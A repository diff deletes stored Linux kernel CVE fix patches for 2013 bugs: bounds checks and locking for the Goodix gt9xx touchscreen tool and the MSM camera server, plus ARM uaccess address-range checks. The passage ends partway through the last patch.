-@@ -22,6 +22,7 @@
-  */
- 
- #include "gt9xx.h"
-+#include <linux/mutex.h>
- 
- #define DATA_LENGTH_UINT    512
- #define CMD_HEAD_LENGTH     (sizeof(st_cmd_head) - sizeof(u8 *))
-@@ -53,6 +54,8 @@ static struct i2c_client *gt_client;
- 
- static struct proc_dir_entry *goodix_proc_entry;
- 
-+static struct mutex lock;
-+
- static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 						unsigned long len, void *data);
- static s32 goodix_tool_read(char *page, char **start, off_t off, int count,
-@@ -188,7 +191,7 @@ static void unregister_i2c_func(void)
- 
- s32 init_wr_node(struct i2c_client *client)
- {
--	s32 i;
-+	u8 i;
- 
- 	gt_client = client;
- 	memset(&cmd_head, 0, sizeof(cmd_head));
-@@ -202,8 +205,8 @@ s32 init_wr_node(struct i2c_client *client)
- 		i--;
- 	}
- 	if (i) {
--		DATA_LENGTH = i * DATA_LENGTH_UINT + GTP_ADDR_LENGTH;
--		GTP_INFO("Applied memory size:%d.", DATA_LENGTH);
-+		DATA_LENGTH = i * DATA_LENGTH_UINT;
-+		dev_dbg(&client->dev, "Applied memory size:%d.", DATA_LENGTH);
- 	} else {
- 		GTP_ERROR("Apply for memory failed.");
- 		return FAIL;
-@@ -214,8 +217,9 @@ s32 init_wr_node(struct i2c_client *client)
- 
- 	register_i2c_func();
- 
-+	mutex_init(&lock);
- 	tool_set_proc_name(procname);
--	goodix_proc_entry = create_proc_entry(procname, 0666, NULL);
-+	goodix_proc_entry = create_proc_entry(procname, 0660, NULL);
- 	if (goodix_proc_entry == NULL) {
- 		GTP_ERROR("Couldn't create proc entry!");
- 		return FAIL;
-@@ -334,9 +338,13 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 	GTP_DEBUG_FUNC();
- 	GTP_DEBUG_ARRAY((u8 *)buff, len);
- 
-+	mutex_lock(&lock);
- 	ret = copy_from_user(&cmd_head, buff, CMD_HEAD_LENGTH);
--	if (ret)
-+	if (ret) {
- 		GTP_ERROR("copy_from_user failed.");
-+		ret = -EACCES;
-+		goto exit;
-+	}
- 
- 	GTP_DEBUG("wr  :0x%02x.", cmd_head.wr);
- 	GTP_DEBUG("flag:0x%02x.", cmd_head.flag);
-@@ -354,6 +362,19 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 	GTP_DEBUG("len:%d.", (s32)len);
- 	GTP_DEBUG("buf[20]:0x%02x.", buff[CMD_HEAD_LENGTH]);
- 
-+	if (cmd_head.data_len > (DATA_LENGTH - GTP_ADDR_LENGTH)) {
-+		pr_err("data len %d > data buff %d, rejected!\n",
-+			cmd_head.data_len, (DATA_LENGTH - GTP_ADDR_LENGTH));
-+		ret = -EINVAL;
-+		goto exit;
-+	}
-+	if (cmd_head.addr_len > GTP_ADDR_LENGTH) {
-+		pr_err(" addr len %d > data buff %d, rejected!\n",
-+			cmd_head.addr_len, GTP_ADDR_LENGTH);
-+		ret = -EINVAL;
-+		goto exit;
-+	}
-+
- 	if (cmd_head.wr == 1) {
- 		/*  copy_from_user(&cmd_head.data[cmd_head.addr_len],
- 				&buff[CMD_HEAD_LENGTH], cmd_head.data_len); */
-@@ -373,7 +394,8 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 		if (cmd_head.flag == 1) {
- 			if (FAIL == comfirm()) {
- 				GTP_ERROR("[WRITE]Comfirm fail!");
--				return FAIL;
-+				ret = -EINVAL;
-+				goto exit;
- 			}
- 		} else if (cmd_head.flag == 2) {
- 			/* Need interrupt! */
-@@ -382,7 +404,8 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 		&cmd_head.data[GTP_ADDR_LENGTH - cmd_head.addr_len],
- 		cmd_head.data_len + cmd_head.addr_len) <= 0) {
- 			GTP_ERROR("[WRITE]Write data failed!");
--			return FAIL;
-+			ret = -EIO;
-+			goto exit;
- 		}
- 
- 		GTP_DEBUG_ARRAY(
-@@ -391,7 +414,8 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 		if (cmd_head.delay)
- 			msleep(cmd_head.delay);
- 
--		return cmd_head.data_len + CMD_HEAD_LENGTH;
-+		ret = cmd_head.data_len + CMD_HEAD_LENGTH;
-+		goto exit;
- 	} else if (cmd_head.wr == 3) {  /* Write ic type */
- 
- 		ret = copy_from_user(&cmd_head.data[0], &buff[CMD_HEAD_LENGTH],
-@@ -399,30 +423,40 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 		if (ret)
- 			GTP_ERROR("copy_from_user failed.");
- 
-+		if (cmd_head.data_len > sizeof(IC_TYPE)) {
-+			pr_err("<<-GTP->> data len %d > data buff %d, rejected!\n",
-+			cmd_head.data_len, sizeof(IC_TYPE));
-+			ret = -EINVAL;
-+			goto exit;
-+		}
- 		memcpy(IC_TYPE, cmd_head.data, cmd_head.data_len);
- 
- 		register_i2c_func();
- 
--		return cmd_head.data_len + CMD_HEAD_LENGTH;
--	} else if (cmd_head.wr == 3) {
-+		ret = cmd_head.data_len + CMD_HEAD_LENGTH;
-+		goto exit;
-+	} else if (cmd_head.wr == 5) {
- 
- 		/* memcpy(IC_TYPE, cmd_head.data, cmd_head.data_len); */
- 
--		return cmd_head.data_len + CMD_HEAD_LENGTH;
-+		ret = cmd_head.data_len + CMD_HEAD_LENGTH;
-+		goto exit;
- 	} else if (cmd_head.wr == 7) { /* disable irq! */
- 		gtp_irq_disable(i2c_get_clientdata(gt_client));
- 
- 		#if GTP_ESD_PROTECT
- 		gtp_esd_switch(gt_client, SWITCH_OFF);
- 		#endif
--		return CMD_HEAD_LENGTH;
-+		ret = CMD_HEAD_LENGTH;
-+		goto exit;
- 	} else if (cmd_head.wr == 9) { /* enable irq! */
- 		gtp_irq_enable(i2c_get_clientdata(gt_client));
- 
- 		#if GTP_ESD_PROTECT
- 		gtp_esd_switch(gt_client, SWITCH_ON);
- 		#endif
--		return CMD_HEAD_LENGTH;
-+		ret = CMD_HEAD_LENGTH;
-+		goto exit;
- 	} else if (cmd_head.wr == 17) {
- 		struct goodix_ts_data *ts = i2c_get_clientdata(gt_client);
- 		ret = copy_from_user(&cmd_head.data[GTP_ADDR_LENGTH],
-@@ -436,27 +470,41 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 			ts->gtp_rawdiff_mode = false;
- 			GTP_DEBUG("gtp leave rawdiff.");
- 		}
--		return CMD_HEAD_LENGTH;
-+		ret = CMD_HEAD_LENGTH;
-+		goto exit;
- 	}
- #ifdef UPDATE_FUNCTIONS
- 	else if (cmd_head.wr == 11) { /* Enter update mode! */
--		if (FAIL == gup_enter_update_mode(gt_client))
--			return FAIL;
-+		if (FAIL == gup_enter_update_mode(gt_client)) {
-+			ret = -EBUSY;
-+			goto exit;
-+		}
- 	} else if (cmd_head.wr == 13) { /* Leave update mode! */
- 		gup_leave_update_mode();
- 	} else if (cmd_head.wr == 15) { /* Update firmware! */
- 		show_len = 0;
- 		total_len = 0;
-+		if (cmd_head.data_len + 1 > DATA_LENGTH) {
-+			pr_err("<<-GTP->> data len %d > data buff %d, rejected!\n",
-+			cmd_head.data_len + 1, DATA_LENGTH);
-+			ret = -EINVAL;
-+			goto exit;
-+		}
- 		memset(cmd_head.data, 0, cmd_head.data_len + 1);
- 		memcpy(cmd_head.data, &buff[CMD_HEAD_LENGTH],
- 					cmd_head.data_len);
- 
--		if (FAIL == gup_update_proc((void *)cmd_head.data))
--			return FAIL;
-+		if (FAIL == gup_update_proc((void *)cmd_head.data)) {
-+			ret = -EBUSY;
-+			goto exit;
-+		}
- 	}
- #endif
-+	ret = CMD_HEAD_LENGTH;
- 
--	return CMD_HEAD_LENGTH;
-+exit:
-+	mutex_unlock(&lock);
-+	return ret;
- }
- 
- /*******************************************************
-@@ -470,10 +518,14 @@ Output:
- static s32 goodix_tool_read(char *page, char **start, off_t off, int count,
- 							int *eof, void *data)
- {
-+	s32 ret;
- 	GTP_DEBUG_FUNC();
- 
-+	mutex_lock(&lock);
- 	if (cmd_head.wr % 2) {
--		return FAIL;
-+		pr_err("<< [READ]command head wrong\n");
-+		ret = -EINVAL;
-+		goto exit;
- 	} else if (!cmd_head.wr) {
- 		u16 len = 0;
- 		s16 data_len = 0;
-@@ -482,7 +534,8 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count,
- 		if (cmd_head.flag == 1) {
- 			if (FAIL == comfirm()) {
- 				GTP_ERROR("[READ]Comfirm fail!");
--				return FAIL;
-+				ret = -EINVAL;
-+				goto exit;
- 			}
- 		} else if (cmd_head.flag == 2) {
- 			/* Need interrupt! */
-@@ -505,11 +558,12 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count,
- 			else
- 				len = data_len;
- 
--			data_len -= DATA_LENGTH;
-+			data_len -= len;
- 
- 			if (tool_i2c_read(cmd_head.data, len) <= 0) {
- 				GTP_ERROR("[READ]Read data failed!");
--				return FAIL;
-+				ret = -EINVAL;
-+				goto exit;
- 			}
- 			memcpy(&page[loc], &cmd_head.data[GTP_ADDR_LENGTH],
- 									len);
-@@ -525,15 +579,14 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count,
- 
- 		GTP_DEBUG("Return ic type:%s len:%d.", page,
- 						(s32)cmd_head.data_len);
--		return cmd_head.data_len;
-+		ret = cmd_head.data_len;
-+		goto exit;
- 		/* return sizeof(IC_TYPE_NAME); */
- 	} else if (cmd_head.wr == 4) {
- 		page[0] = show_len >> 8;
- 		page[1] = show_len & 0xff;
- 		page[2] = total_len >> 8;
- 		page[3] = total_len & 0xff;
--
--		return cmd_head.data_len;
- 	} else if (6 == cmd_head.wr) {
- 		/* Read error code! */
- 	} else if (8 == cmd_head.wr) { /*Read driver version */
-@@ -544,6 +597,9 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count,
- 		memcpy(page, GTP_DRIVER_VERSION, tmp_len);
- 		page[tmp_len] = 0;
- 	}
-+	ret = cmd_head.data_len;
- 
--	return cmd_head.data_len;
-+exit:
-+	mutex_unlock(&lock);
-+	return ret;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-6122/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-6122/ANY/0001.patch
deleted file mode 100644
index 39e3ca4e..00000000
--- a/Patches/Linux_CVEs/CVE-2013-6122/ANY/0001.patch
+++ /dev/null
@@ -1,300 +0,0 @@
-From f53bcf29a6e7a66b3d935b8d562fa00829261f05 Mon Sep 17 00:00:00 2001
-From: Bingzhe Cai <bingzhec@codeaurora.org>
-Date: Tue, 24 Sep 2013 01:42:12 +0800
-Subject: input: touchpanel: fix security issues in GT915 driver
-
-There are multiple buffer overflow and input validation issues
-in Goodix gt915 driver, fix these issues by adding data length
-check and change file system node mode.
-
-CRs-Fixed: 526101
-Change-Id: I5173fc1ca021fd45c939c7c8a4f460651330de5b
-Signed-off-by: Bingzhe Cai <bingzhec@codeaurora.org>
----
- drivers/input/touchscreen/gt9xx/goodix_tool.c | 110 +++++++++++++++++++-------
- 1 file changed, 83 insertions(+), 27 deletions(-)
-
-diff --git a/drivers/input/touchscreen/gt9xx/goodix_tool.c b/drivers/input/touchscreen/gt9xx/goodix_tool.c
-index bdac3fd..aa8159f 100644
---- a/drivers/input/touchscreen/gt9xx/goodix_tool.c
-+++ b/drivers/input/touchscreen/gt9xx/goodix_tool.c
-@@ -22,6 +22,7 @@
-  */
- 
- #include "gt9xx.h"
-+#include <linux/mutex.h>
- 
- #define DATA_LENGTH_UINT    512
- #define CMD_HEAD_LENGTH     (sizeof(st_cmd_head) - sizeof(u8 *))
-@@ -53,6 +54,8 @@ static struct i2c_client *gt_client;
- 
- static struct proc_dir_entry *goodix_proc_entry;
- 
-+static struct mutex lock;
-+
- static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 						unsigned long len, void *data);
- static s32 goodix_tool_read(char *page, char **start, off_t off, int count,
-@@ -188,7 +191,7 @@ static void unregister_i2c_func(void)
- 
- s32 init_wr_node(struct i2c_client *client)
- {
--	s32 i;
-+	u8 i;
- 
- 	gt_client = client;
- 	memset(&cmd_head, 0, sizeof(cmd_head));
-@@ -202,8 +205,8 @@ s32 init_wr_node(struct i2c_client *client)
- 		i--;
- 	}
- 	if (i) {
--		DATA_LENGTH = i * DATA_LENGTH_UINT + GTP_ADDR_LENGTH;
--		GTP_INFO("Applied memory size:%d.", DATA_LENGTH);
-+		DATA_LENGTH = i * DATA_LENGTH_UINT;
-+		dev_dbg(&client->dev, "Applied memory size:%d.", DATA_LENGTH);
- 	} else {
- 		GTP_ERROR("Apply for memory failed.");
- 		return FAIL;
-@@ -214,8 +217,9 @@ s32 init_wr_node(struct i2c_client *client)
- 
- 	register_i2c_func();
- 
-+	mutex_init(&lock);
- 	tool_set_proc_name(procname);
--	goodix_proc_entry = create_proc_entry(procname, 0666, NULL);
-+	goodix_proc_entry = create_proc_entry(procname, 0660, NULL);
- 	if (goodix_proc_entry == NULL) {
- 		GTP_ERROR("Couldn't create proc entry!");
- 		return FAIL;
-@@ -334,9 +338,13 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 	GTP_DEBUG_FUNC();
- 	GTP_DEBUG_ARRAY((u8 *)buff, len);
- 
-+	mutex_lock(&lock);
- 	ret = copy_from_user(&cmd_head, buff, CMD_HEAD_LENGTH);
--	if (ret)
-+	if (ret) {
- 		GTP_ERROR("copy_from_user failed.");
-+		ret = -EACCES;
-+		goto exit;
-+	}
- 
- 	GTP_DEBUG("wr  :0x%02x.", cmd_head.wr);
- 	GTP_DEBUG("flag:0x%02x.", cmd_head.flag);
-@@ -354,6 +362,19 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 	GTP_DEBUG("len:%d.", (s32)len);
- 	GTP_DEBUG("buf[20]:0x%02x.", buff[CMD_HEAD_LENGTH]);
- 
-+	if (cmd_head.data_len > (DATA_LENGTH - GTP_ADDR_LENGTH)) {
-+		pr_err("data len %d > data buff %d, rejected!\n",
-+			cmd_head.data_len, (DATA_LENGTH - GTP_ADDR_LENGTH));
-+		ret = -EINVAL;
-+		goto exit;
-+	}
-+	if (cmd_head.addr_len > GTP_ADDR_LENGTH) {
-+		pr_err(" addr len %d > data buff %d, rejected!\n",
-+			cmd_head.addr_len, GTP_ADDR_LENGTH);
-+		ret = -EINVAL;
-+		goto exit;
-+	}
-+
- 	if (cmd_head.wr == 1) {
- 		/*  copy_from_user(&cmd_head.data[cmd_head.addr_len],
- 				&buff[CMD_HEAD_LENGTH], cmd_head.data_len); */
-@@ -373,7 +394,8 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 		if (cmd_head.flag == 1) {
- 			if (FAIL == comfirm()) {
- 				GTP_ERROR("[WRITE]Comfirm fail!");
--				return FAIL;
-+				ret = -EINVAL;
-+				goto exit;
- 			}
- 		} else if (cmd_head.flag == 2) {
- 			/* Need interrupt! */
-@@ -382,7 +404,8 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 		&cmd_head.data[GTP_ADDR_LENGTH - cmd_head.addr_len],
- 		cmd_head.data_len + cmd_head.addr_len) <= 0) {
- 			GTP_ERROR("[WRITE]Write data failed!");
--			return FAIL;
-+			ret = -EIO;
-+			goto exit;
- 		}
- 
- 		GTP_DEBUG_ARRAY(
-@@ -391,7 +414,8 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 		if (cmd_head.delay)
- 			msleep(cmd_head.delay);
- 
--		return cmd_head.data_len + CMD_HEAD_LENGTH;
-+		ret = cmd_head.data_len + CMD_HEAD_LENGTH;
-+		goto exit;
- 	} else if (cmd_head.wr == 3) {  /* Write ic type */
- 
- 		ret = copy_from_user(&cmd_head.data[0], &buff[CMD_HEAD_LENGTH],
-@@ -399,30 +423,40 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 		if (ret)
- 			GTP_ERROR("copy_from_user failed.");
- 
-+		if (cmd_head.data_len > sizeof(IC_TYPE)) {
-+			pr_err("<<-GTP->> data len %d > data buff %d, rejected!\n",
-+			cmd_head.data_len, sizeof(IC_TYPE));
-+			ret = -EINVAL;
-+			goto exit;
-+		}
- 		memcpy(IC_TYPE, cmd_head.data, cmd_head.data_len);
- 
- 		register_i2c_func();
- 
--		return cmd_head.data_len + CMD_HEAD_LENGTH;
--	} else if (cmd_head.wr == 3) {
-+		ret = cmd_head.data_len + CMD_HEAD_LENGTH;
-+		goto exit;
-+	} else if (cmd_head.wr == 5) {
- 
- 		/* memcpy(IC_TYPE, cmd_head.data, cmd_head.data_len); */
- 
--		return cmd_head.data_len + CMD_HEAD_LENGTH;
-+		ret = cmd_head.data_len + CMD_HEAD_LENGTH;
-+		goto exit;
- 	} else if (cmd_head.wr == 7) { /* disable irq! */
- 		gtp_irq_disable(i2c_get_clientdata(gt_client));
- 
- 		#if GTP_ESD_PROTECT
- 		gtp_esd_switch(gt_client, SWITCH_OFF);
- 		#endif
--		return CMD_HEAD_LENGTH;
-+		ret = CMD_HEAD_LENGTH;
-+		goto exit;
- 	} else if (cmd_head.wr == 9) { /* enable irq! */
- 		gtp_irq_enable(i2c_get_clientdata(gt_client));
- 
- 		#if GTP_ESD_PROTECT
- 		gtp_esd_switch(gt_client, SWITCH_ON);
- 		#endif
--		return CMD_HEAD_LENGTH;
-+		ret = CMD_HEAD_LENGTH;
-+		goto exit;
- 	} else if (cmd_head.wr == 17) {
- 		struct goodix_ts_data *ts = i2c_get_clientdata(gt_client);
- 		ret = copy_from_user(&cmd_head.data[GTP_ADDR_LENGTH],
-@@ -436,27 +470,41 @@ static s32 goodix_tool_write(struct file *filp, const char __user *buff,
- 			ts->gtp_rawdiff_mode = false;
- 			GTP_DEBUG("gtp leave rawdiff.");
- 		}
--		return CMD_HEAD_LENGTH;
-+		ret = CMD_HEAD_LENGTH;
-+		goto exit;
- 	}
- #ifdef UPDATE_FUNCTIONS
- 	else if (cmd_head.wr == 11) { /* Enter update mode! */
--		if (FAIL == gup_enter_update_mode(gt_client))
--			return FAIL;
-+		if (FAIL == gup_enter_update_mode(gt_client)) {
-+			ret = -EBUSY;
-+			goto exit;
-+		}
- 	} else if (cmd_head.wr == 13) { /* Leave update mode! */
- 		gup_leave_update_mode();
- 	} else if (cmd_head.wr == 15) { /* Update firmware! */
- 		show_len = 0;
- 		total_len = 0;
-+		if (cmd_head.data_len + 1 > DATA_LENGTH) {
-+			pr_err("<<-GTP->> data len %d > data buff %d, rejected!\n",
-+			cmd_head.data_len + 1, DATA_LENGTH);
-+			ret = -EINVAL;
-+			goto exit;
-+		}
- 		memset(cmd_head.data, 0, cmd_head.data_len + 1);
- 		memcpy(cmd_head.data, &buff[CMD_HEAD_LENGTH],
- 					cmd_head.data_len);
- 
--		if (FAIL == gup_update_proc((void *)cmd_head.data))
--			return FAIL;
-+		if (FAIL == gup_update_proc((void *)cmd_head.data)) {
-+			ret = -EBUSY;
-+			goto exit;
-+		}
- 	}
- #endif
-+	ret = CMD_HEAD_LENGTH;
- 
--	return CMD_HEAD_LENGTH;
-+exit:
-+	mutex_unlock(&lock);
-+	return ret;
- }
- 
- /*******************************************************
-@@ -470,10 +518,14 @@ Output:
- static s32 goodix_tool_read(char *page, char **start, off_t off, int count,
- 							int *eof, void *data)
- {
-+	s32 ret;
- 	GTP_DEBUG_FUNC();
- 
-+	mutex_lock(&lock);
- 	if (cmd_head.wr % 2) {
--		return FAIL;
-+		pr_err("<< [READ]command head wrong\n");
-+		ret = -EINVAL;
-+		goto exit;
- 	} else if (!cmd_head.wr) {
- 		u16 len = 0;
- 		s16 data_len = 0;
-@@ -482,7 +534,8 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count,
- 		if (cmd_head.flag == 1) {
- 			if (FAIL == comfirm()) {
- 				GTP_ERROR("[READ]Comfirm fail!");
--				return FAIL;
-+				ret = -EINVAL;
-+				goto exit;
- 			}
- 		} else if (cmd_head.flag == 2) {
- 			/* Need interrupt! */
-@@ -505,11 +558,12 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count,
- 			else
- 				len = data_len;
- 
--			data_len -= DATA_LENGTH;
-+			data_len -= len;
- 
- 			if (tool_i2c_read(cmd_head.data, len) <= 0) {
- 				GTP_ERROR("[READ]Read data failed!");
--				return FAIL;
-+				ret = -EINVAL;
-+				goto exit;
- 			}
- 			memcpy(&page[loc], &cmd_head.data[GTP_ADDR_LENGTH],
- 									len);
-@@ -525,15 +579,14 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count,
- 
- 		GTP_DEBUG("Return ic type:%s len:%d.", page,
- 						(s32)cmd_head.data_len);
--		return cmd_head.data_len;
-+		ret = cmd_head.data_len;
-+		goto exit;
- 		/* return sizeof(IC_TYPE_NAME); */
- 	} else if (cmd_head.wr == 4) {
- 		page[0] = show_len >> 8;
- 		page[1] = show_len & 0xff;
- 		page[2] = total_len >> 8;
- 		page[3] = total_len & 0xff;
--
--		return cmd_head.data_len;
- 	} else if (6 == cmd_head.wr) {
- 		/* Read error code! */
- 	} else if (8 == cmd_head.wr) { /*Read driver version */
-@@ -544,6 +597,9 @@ static s32 goodix_tool_read(char *page, char **start, off_t off, int count,
- 		memcpy(page, GTP_DRIVER_VERSION, tmp_len);
- 		page[tmp_len] = 0;
- 	}
-+	ret = cmd_head.data_len;
- 
--	return cmd_head.data_len;
-+exit:
-+	mutex_unlock(&lock);
-+	return ret;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-6123/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-6123/ANY/0001.patch
deleted file mode 100644
index fde5826b..00000000
--- a/Patches/Linux_CVEs/CVE-2013-6123/ANY/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 7beb04ea945a7178e61d935918d3cb152996b558 Mon Sep 17 00:00:00 2001
-From: Alok Kediya <kediya@codeaurora.org>
-Date: Mon, 9 Dec 2013 10:52:49 +0530
-Subject: msm: camera: Added bounds check for index parameter
-
-Bound check the index param from user space to avoid
-any invalid memory access.
-
-CRs-Fixed: 583366
-
-Change-Id: I0f887bb8f1fa5a69a55e23dbb522b3bb694ad27f
-Signed-off-by: Alok Kediya <kediya@codeaurora.org>
----
- drivers/media/video/msm/server/msm_cam_server.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/drivers/media/video/msm/server/msm_cam_server.c b/drivers/media/video/msm/server/msm_cam_server.c
-index 5fc8e83..6e49082 100644
---- a/drivers/media/video/msm/server/msm_cam_server.c
-+++ b/drivers/media/video/msm/server/msm_cam_server.c
-@@ -1390,6 +1390,15 @@ static long msm_ioctl_server(struct file *file, void *fh,
- 		}
- 
- 		mutex_lock(&g_server_dev.server_queue_lock);
-+
-+		if(u_isp_event.isp_data.ctrl.queue_idx < 0 ||
-+		u_isp_event.isp_data.ctrl.queue_idx >= MAX_NUM_ACTIVE_CAMERA) {
-+			pr_err("%s: Invalid index %d\n", __func__,
-+				u_isp_event.isp_data.ctrl.queue_idx);
-+			rc = -EINVAL;
-+			return rc;
-+		}
-+
- 		if (!g_server_dev.server_queue
- 			[u_isp_event.isp_data.ctrl.queue_idx].queue_active) {
- 			pr_err("%s: Invalid queue\n", __func__);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-6123/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2013-6123/ANY/0002.patch
deleted file mode 100644
index eb0b7ef1..00000000
--- a/Patches/Linux_CVEs/CVE-2013-6123/ANY/0002.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From 60e4af06161d91d5aeaa04c7d6e9f4345a6acdd4 Mon Sep 17 00:00:00 2001
-From: Alok Kediya <kediya@codeaurora.org>
-Date: Thu, 10 Oct 2013 12:11:01 +0530
-Subject: msm:camera: Bounds and validity check for params
-
-Check the range and validity of parameters before accessing.
-
-CRs-fixed: 550607, 554434, 554436
-
-Change-Id: I2d6aec4f9cb9385789c0df6a2c4abefe9e87539f
-Signed-off-by: Alok Kediya <kediya@codeaurora.org>
----
- drivers/media/video/msm/server/msm_cam_server.c | 20 ++++++++++++++++----
- 1 file changed, 16 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/media/video/msm/server/msm_cam_server.c b/drivers/media/video/msm/server/msm_cam_server.c
-index 4bda7a3..5fc8e83 100644
---- a/drivers/media/video/msm/server/msm_cam_server.c
-+++ b/drivers/media/video/msm/server/msm_cam_server.c
-@@ -311,6 +311,13 @@ static int msm_ctrl_cmd_done(void *arg)
- 		goto ctrl_cmd_done_error;
- 	}
- 
-+	if(command->queue_idx < 0 ||
-+		command->queue_idx >= MAX_NUM_ACTIVE_CAMERA) {
-+		pr_err("%s: Invalid value OR index %d\n", __func__,
-+		  command->queue_idx);
-+		goto ctrl_cmd_done_error;
-+	}
-+
- 	if (!g_server_dev.server_queue[command->queue_idx].queue_active) {
- 		pr_err("%s: Invalid queue\n", __func__);
- 		goto ctrl_cmd_done_error;
-@@ -339,7 +346,8 @@ static int msm_ctrl_cmd_done(void *arg)
- 				max_control_command_size);
- 			goto ctrl_cmd_done_error;
- 		}
--		if (copy_from_user(command->value, uptr, command->length)) {
-+		if (copy_from_user(command->value, (void __user *)uptr,
-+			command->length)) {
- 			pr_err("%s: copy_from_user failed, size=%d\n",
- 				__func__, sizeof(struct msm_ctrl_cmd));
- 			goto ctrl_cmd_done_error;
-@@ -2650,13 +2658,17 @@ int msm_server_send_ctrl(struct msm_ctrl_cmd *out,
- 	struct msm_queue_cmd *event_qcmd;
- 	struct msm_ctrl_cmd *ctrlcmd;
- 	struct msm_cam_server_dev *server_dev = &g_server_dev;
--	struct msm_device_queue *queue =
--		&server_dev->server_queue[out->queue_idx].ctrl_q;
--
-+	struct msm_device_queue *queue;
- 	struct v4l2_event v4l2_evt;
- 	struct msm_isp_event_ctrl *isp_event;
- 	void *ctrlcmd_data;
- 
-+	if(out->queue_idx < 0 || out->queue_idx >= MAX_NUM_ACTIVE_CAMERA) {
-+		pr_err("%s: Invalid index %d\n", __func__, out->queue_idx);
-+		return -EINVAL;
-+	}
-+	queue = &server_dev->server_queue[out->queue_idx].ctrl_q;
-+
- 	event_qcmd = kzalloc(sizeof(struct msm_queue_cmd), GFP_KERNEL);
- 	if (!event_qcmd) {
- 		pr_err("%s Insufficient memory. return", __func__);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-6282/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-6282/ANY/0001.patch
deleted file mode 100644
index 62f1b88a..00000000
--- a/Patches/Linux_CVEs/CVE-2013-6282/ANY/0001.patch
+++ /dev/null
@@ -1,253 +0,0 @@
-From 76565e3d786bed66f247c682bd9f591098522483 Mon Sep 17 00:00:00 2001
-From: Russell King <rmk+kernel@arm.linux.org.uk>
-Date: Fri, 7 Sep 2012 18:22:28 +0100
-Subject: ARM: 7527/1: uaccess: explicitly check __user pointer when
- !CPU_USE_DOMAINS
-
-The {get,put}_user macros don't perform range checking on the provided
-__user address when !CPU_HAS_DOMAINS.
-
-This patch reworks the out-of-line assembly accessors to check the user
-address against a specified limit, returning -EFAULT if is is out of
-range.
-
-[will: changed get_user register allocation to match put_user]
-[rmk: fixed building on older ARM architectures]
-
-CRs-Fixed: 504011
-Change-Id: I3818045a136fcdf72deb1371b132e090fd7ed643
-Reported-by: Catalin Marinas <catalin.marinas@arm.com>
-Signed-off-by: Will Deacon <will.deacon@arm.com>
-Cc: stable@vger.kernel.org
-Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk>
-Git-commit: 8404663f81d212918ff85f493649a7991209fa04
-Git-repo: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
-Signed-off-by: Laura Abbott <lauraa@codeaurora.org>
----
- arch/arm/include/asm/assembler.h |  8 ++++++++
- arch/arm/include/asm/uaccess.h   | 40 +++++++++++++++++++++++++++-------------
- arch/arm/lib/getuser.S           | 23 +++++++++++++++--------
- arch/arm/lib/putuser.S           |  6 ++++++
- 4 files changed, 56 insertions(+), 21 deletions(-)
-
-diff --git a/arch/arm/include/asm/assembler.h b/arch/arm/include/asm/assembler.h
-index 03fb936..5c8b3bf4 100644
---- a/arch/arm/include/asm/assembler.h
-+++ b/arch/arm/include/asm/assembler.h
-@@ -320,4 +320,12 @@
- 	.size \name , . - \name
- 	.endm
- 
-+	.macro check_uaccess, addr:req, size:req, limit:req, tmp:req, bad:req
-+#ifndef CONFIG_CPU_USE_DOMAINS
-+	adds	\tmp, \addr, #\size - 1
-+	sbcccs	\tmp, \tmp, \limit
-+	bcs	\bad
-+#endif
-+	.endm
-+
- #endif /* __ASM_ASSEMBLER_H__ */
-diff --git a/arch/arm/include/asm/uaccess.h b/arch/arm/include/asm/uaccess.h
-index 71f6536..0a070e9 100644
---- a/arch/arm/include/asm/uaccess.h
-+++ b/arch/arm/include/asm/uaccess.h
-@@ -101,28 +101,39 @@ extern int __get_user_1(void *);
- extern int __get_user_2(void *);
- extern int __get_user_4(void *);
- 
--#define __get_user_x(__r2,__p,__e,__s,__i...)				\
-+#define __GUP_CLOBBER_1	"lr", "cc"
-+#ifdef CONFIG_CPU_USE_DOMAINS
-+#define __GUP_CLOBBER_2	"ip", "lr", "cc"
-+#else
-+#define __GUP_CLOBBER_2 "lr", "cc"
-+#endif
-+#define __GUP_CLOBBER_4	"lr", "cc"
-+
-+#define __get_user_x(__r2,__p,__e,__l,__s)				\
- 	   __asm__ __volatile__ (					\
- 		__asmeq("%0", "r0") __asmeq("%1", "r2")			\
-+		__asmeq("%3", "r1")					\
- 		"bl	__get_user_" #__s				\
- 		: "=&r" (__e), "=r" (__r2)				\
--		: "0" (__p)						\
--		: __i, "cc")
